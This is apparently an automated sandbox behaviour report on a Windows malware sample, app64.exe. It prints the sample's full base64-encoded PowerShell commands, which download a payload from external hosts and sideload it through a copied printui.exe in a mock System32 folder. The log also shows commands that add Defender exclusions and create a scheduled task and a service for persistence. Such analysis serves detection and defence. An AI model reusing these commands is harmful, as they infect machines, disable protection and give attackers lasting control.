          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: app64.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: app64.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
          Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
          Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
          Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
          Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
          Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
          Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
          Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
          Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbG
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMz
          Source: unknownProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
          Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
          Source: C:\Users\user\Desktop\app64.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,28_2_00007FF8B83AFC30
          Source: app64.exeStatic PE information: section name: .xdata
          Source: pyld.dll.3.drStatic PE information: section name: .xdata
          Source: libiconv-2.dll.13.drStatic PE information: section name: .xdata
          Source: libiconv-2.dll.13.drStatic PE information: section name: /4
          Source: libiconv-2.dll.13.drStatic PE information: section name: /19
          Source: libiconv-2.dll.13.drStatic PE information: section name: /31
          Source: libiconv-2.dll.13.drStatic PE information: section name: /45
          Source: libiconv-2.dll.13.drStatic PE information: section name: /57
          Source: libiconv-2.dll.13.drStatic PE information: section name: /70
          Source: libiconv-2.dll.13.drStatic PE information: section name: /81
          Source: libiconv-2.dll.13.drStatic PE information: section name: /92
          Source: libintl-9.dll.13.drStatic PE information: section name: .xdata
          Source: libintl-9.dll.13.drStatic PE information: section name: /4
          Source: libintl-9.dll.13.drStatic PE information: section name: /19
          Source: libintl-9.dll.13.drStatic PE information: section name: /31
          Source: libintl-9.dll.13.drStatic PE information: section name: /45
          Source: libintl-9.dll.13.drStatic PE information: section name: /57
          Source: libintl-9.dll.13.drStatic PE information: section name: /70
          Source: libintl-9.dll.13.drStatic PE information: section name: /81
          Source: libintl-9.dll.13.drStatic PE information: section name: /92
          Source: libwinpthread-1.dll.13.drStatic PE information: section name: .xdata
          Source: console_zero.exe.13.drStatic PE information: section name: .fptable
          Source: vcruntime140d.dll.13.drStatic PE information: section name: _RDATA
          Source: usvcldr64.dat.13.drStatic PE information: section name: .fptable
          Source: x590769.dat.13.drStatic PE information: section name: .fptable
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF117338 pushfq ; retf 0_2_00007FF7DF117339
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF117393 push rbp; retf 0_2_00007FF7DF1173C3
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF1177EE push rax; retf 0_2_00007FF7DF1177F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848FF0DB6 push es; ret 3_2_00007FF848FF0DB7
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848E1D2A5 pushad ; iretd 16_2_00007FF848E1D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848F332F2 pushad ; retf 16_2_00007FF848F33329
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_649487B2 push r11; ret 28_2_649487ED
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_660224A8 push rax; retf 28_2_660224B1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829984B push 00000000h; retf 28_2_68299850
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_682970AC push rax; iretd 28_2_682970AD
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_682951B2 push rdx; retn 0000h28_2_682951B3
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829998B push 00000000h; ret 28_2_68299990
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829999B push 00000000h; iretd 28_2_682999A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829AA73 push 00000000h; ret 28_2_6829AA78
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829ABBB push 00000000h; retf 28_2_6829ABC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829ABB3 push 00000000h; ret 28_2_6829ABB8
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6829A7AB push 00000000h; iretd 28_2_6829A7B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EC2D0 push 680001C2h; retn 0001h28_2_00007FF8A92EC2D5
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EC2C8 push 680001C2h; retn 0001h28_2_00007FF8A92EC2CD
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EC2B8 push 050001C2h; retn 0001h28_2_00007FF8A92EC2C5
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83ACC08 push rdi; retn 0004h28_2_00007FF8B83ACC09
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83ACC0C push rdx; ret 28_2_00007FF8B83ACC0D
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83ACC08 push rdi; retn 0004h34_2_00007FF8B83ACC09
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83ACC0C push rdx; ret 34_2_00007FF8B83ACC0D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479CD08A push eax; retf 40_2_00007FF8479CD08B
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479C5F3B push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479C5EF2 push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479CCE62 pushad ; retf 40_2_00007FF8479CCE63
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479CBDDD pushad ; retf 40_2_00007FF8479CBF03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479CBD2D pushad ; retf 40_2_00007FF8479CBF03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FF8479CBC7D push esp; retf 40_2_00007FF8479CBC2C

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters ServiceDll C:\Windows\System32\x590769.datJump to behavior
          Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
          Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x590769.datJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
          Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\pyld.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\pyld.dllJump to dropped file
          Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x590769.datJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
          Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

          Boot Survival

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\pyld.dllJump to dropped file
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\ParametersJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
